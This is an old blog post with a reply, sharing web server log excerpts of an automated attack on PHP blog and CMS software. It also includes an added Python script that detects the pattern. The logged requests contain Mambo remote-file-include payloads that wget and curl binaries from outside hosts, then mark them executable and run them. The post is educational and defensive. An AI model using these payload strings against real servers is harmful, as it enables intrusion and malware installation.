What does an HTTP attack look like?
Posted for educational edification, here's a snippet from the AZSPF.ORG web server logs showing what I consider to be multiple attacks from the same source:
200.93.206.54 - - [03/Apr/2006:05:03:14 -0700] "POST /xmlrpc.php HTTP/1.1" 200 260
200.93.206.54 - - [03/Apr/2006:05:03:18 -0700] "POST /blog/xmlrpc.php HTTP/1.1" 200 260
200.93.206.54 - - [03/Apr/2006:05:03:25 -0700] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 200 260
200.93.206.54 - - [03/Apr/2006:05:03:29 -0700] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 200 260
200.93.206.54 - - [03/Apr/2006:05:03:30 -0700] "POST /wordpress/xmlrpc.php HTTP/1.1" 200 260
200.93.206.54 - - [03/Apr/2006:05:03:31 -0700] "POST /drupal/xmlrpc.php HTTP/1.1" 200 260
200.93.206.54 - - [03/Apr/2006:05:03:36 -0700] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 200 260
200.93.206.54 - - [03/Apr/2006:05:03:41 -0700] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_co
ntent&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://69.17.157.154/cmd.txt?&cmd=cd%20/tmp;wget%2070.168.74.193/strange
;chmod%20744%20strange;./strange;cd%20/var/tmp;curl%20-o%20arts%20http://207.90.211.54/arts;chmod%20744%20arts;./arts;echo%20YYY;e
cho| HTTP/1.1" 200 260
200.93.206.54 - - [03/Apr/2006:05:03:42 -0700] "POST /xmlrpc.php HTTP/1.1" 200 260
200.93.206.54 - - [03/Apr/2006:05:03:45 -0700] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_con
tent&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://69.17.157.154/cmd.txt?&cmd=cd%20/tmp;wget%2070.168.74.193/strange;
chmod%20744%20strange;./strange;cd%20/var/tmp;curl%20-o%20arts%20http://207.90.211.54/arts;chmod%20744%20arts;./arts;echo%20YYY;ec
ho| HTTP/1.1" 200 260
200.93.206.54 - - [03/Apr/2006:05:03:49 -0700] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mos
Config_absolute_path=http://69.17.157.154/cmd.txt?&cmd=cd%20/tmp;wget%2070.168.74.193/strange;chmod%20744%20strange;./strange;cd%2
0/var/tmp;curl%20-o%20arts%20http://207.90.211.54/arts;chmod%20744%20arts;./arts;echo%20YYY;echo| HTTP/1.1" 200 260
200.93.206.54 - - [03/Apr/2006:05:04:04 -0700] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 200 260
200.93.206.54 - - [03/Apr/2006:05:04:16 -0700] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 200 260
What's in your log files?
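One way to flag the pattern in the log above automatically, added here as an example and not part of the original post: it parses Common Log Format lines and reports clients that POST to several distinct xmlrpc.php paths, or that send a URL-valued parameter or shell commands in the request. The sample log lines, the addresses (documentation ranges), the threshold and the finding names are constructed assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Common Log Format prefix: client, timestamp, request line, status, size.
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (.*?) HTTP/[\d.]+" (\d{3}) (\S+)')
# A query parameter whose value is itself a URL (the remote-include pattern above).
REMOTE_VALUE_RE = re.compile(r'[?&][^=&]+=(?:https?|ftp)://', re.I)
# A shell separator followed by a download or execute step inside the URL.
SHELL_RE = re.compile(r'[;|`]\s*(?:wget|curl|chmod|\./)', re.I)
PROBE_THRESHOLD = 3  # assumption: distinct xmlrpc.php paths from one client

# Constructed sample input, modelled on the shape of the lines in the post.
SAMPLE_LOG = """\
192.0.2.10 - - [03/Apr/2006:05:03:14 -0700] "POST /xmlrpc.php HTTP/1.1" 200 260
192.0.2.10 - - [03/Apr/2006:05:03:18 -0700] "POST /blog/xmlrpc.php HTTP/1.1" 200 260
192.0.2.10 - - [03/Apr/2006:05:03:25 -0700] "POST /drupal/xmlrpc.php HTTP/1.1" 200 260
192.0.2.10 - - [03/Apr/2006:05:03:49 -0700] "GET /mambo/index2.php?mosConfig_absolute_path=http://198.51.100.7/cmd.txt?&cmd=cd%20/tmp;wget%20198.51.100.9/sample;echo%20YYY HTTP/1.1" 200 260
192.0.2.20 - - [03/Apr/2006:05:10:00 -0700] "POST /xmlrpc.php HTTP/1.1" 200 375
192.0.2.30 - - [03/Apr/2006:05:11:00 -0700] "GET /index.php?option=com_content&id=1 HTTP/1.1" 200 5120
"""

def analyze(log_text, threshold=PROBE_THRESHOLD):
    """Return {client: sorted finding names} for clients showing the scan pattern."""
    probes = defaultdict(set)    # client -> distinct xmlrpc.php paths POSTed to
    findings = defaultdict(set)  # client -> finding names
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a Common Log Format line (e.g. a wrapped fragment)
        client, _ts, method, target, _status, _size = m.groups()
        decoded = unquote(target)  # %20 and friends hide the separators
        path = decoded.split('?', 1)[0]
        if method == 'POST' and path.endswith('/xmlrpc.php'):
            probes[client].add(path)
        if REMOTE_VALUE_RE.search(decoded):
            findings[client].add('remote-url-parameter')
        if SHELL_RE.search(decoded):
            findings[client].add('shell-command-in-url')
    for client, paths in probes.items():
        if len(paths) >= threshold:
            findings[client].add('xmlrpc-path-sweep')
    return {client: sorted(names) for client, names in findings.items()}

if __name__ == '__main__':
    for client, names in analyze(SAMPLE_LOG).items():
        print(client, ', '.join(names))
```

A single POST to /xmlrpc.php, as from 192.0.2.20 in the sample, is not reported: legitimate blog clients use that endpoint, so only the sweep across several install paths counts.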



Very Nice!
On a similar note, someone posted these logs in March to seclists.org - http://seclists.org/lists/fulldisclosure/2006/Mar/0176.html
I would guess that the host scanning would show up at DShield as well!
> 83.84.14X.XXX - - [06/Mar/2006:18:18:17 -0500] "GET
> /articles/mambo/index2.php?_REQUEST[option]=com_content wget%20163.24.84.10/chspsp;chmod%20744%20chspsp;./chspsp;echo%20YYY;echo|
> HTTP /1.1" 404 8696 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
> 5.1;)"
> 83.84.14X.XXX - - [06/Mar/2006:18:18:18 -0500] "GET
> /cvs/mambo/index2.php?_REQUEST[option]=com_content wget%20163.24.84.10/chspsp;chmod%20744%20chspsp;./chspsp;echo%20YYY;echo|
> HTTP /1.1" 404 8696 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
> 5.1;)"
> 83.84.14X.XXX - - [06/Mar/2006:18:18:19 -0500] "POST /xmlrpc.php
> HTTP /1.1" 200 375 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
> 5.1;)"
> 83.84.14X.XXX - - [06/Mar/2006:18:18:20 -0500] "POST /blog/xmlrpc.php
> HTTP /1.1" 404 8696 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
> 5.1;)"
> 83.84.14X.XXX - - [06/Mar/2006:18:18:21 -0500] "POST
> /blog/xmlsrv/xmlrpc.php HTTP /1.1" 404 8696 "-" "Mozilla/4.0
> (compatible; MSIE 6.0; Windows NT 5.1;)"
> 83.84.14X.XXX - - [06/Mar/2006:18:18:22 -0500] "POST
> /blogs/xmlsrv/xmlrpc.php HTTP /1.1" 404 8696 "-" "Mozilla/4.0
> (compatible; MSIE 6.0; Windows NT 5.1;)"
> 83.84.14X.XXX - - [06/Mar/2006:18:18:23 -0500] "POST
> /drupal/xmlrpc.php HTTP /1.1" 404 8696 "-" "Mozilla/4.0 (compatible;
> MSIE 6.0; Windows NT 5.1;)"
> 83.84.14X.XXX - - [06/Mar/2006:18:18:25 -0500] "POST
> /phpgroupware/xmlrpc.php HTTP /1.1" 404 8696 "-" "Mozilla/4.0
> (compatible; MSIE 6.0; Windows NT 5.1;)"
> 83.84.14X.XXX - - [06/Mar/2006:18:18:26 -0500] "POST
> /wordpress/xmlrpc.php HTTP /1.1" 404 8696 "-" "Mozilla/4.0 (compatible;
> MSIE 6.0; Windows NT 5.1;)"
> 83.84.14X.XXX - - [06/Mar/2006:18:18:27 -0500] "POST /xmlrpc.php
> HTTP /1.1" 200 375 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
> 5.1;)"
> 83.84.14X.XXX - - [06/Mar/2006:18:18:28 -0500] "POST
> /xmlrpc/xmlrpc.php HTTP /1.1" 404 8696 "-" "Mozilla/4.0 (compatible;
> MSIE 6.0; Windows NT 5.1;)"
> 83.84.14X.XXX - - [06/Mar/2006:18:18:29 -0500] "POST
> /xmlsrv/xmlrpc.php HTTP /1.1" 404 8696 "-" "Mozilla/4.0 (compatible;
> MSIE 6.0; Windows NT 5.1;)"
Geoff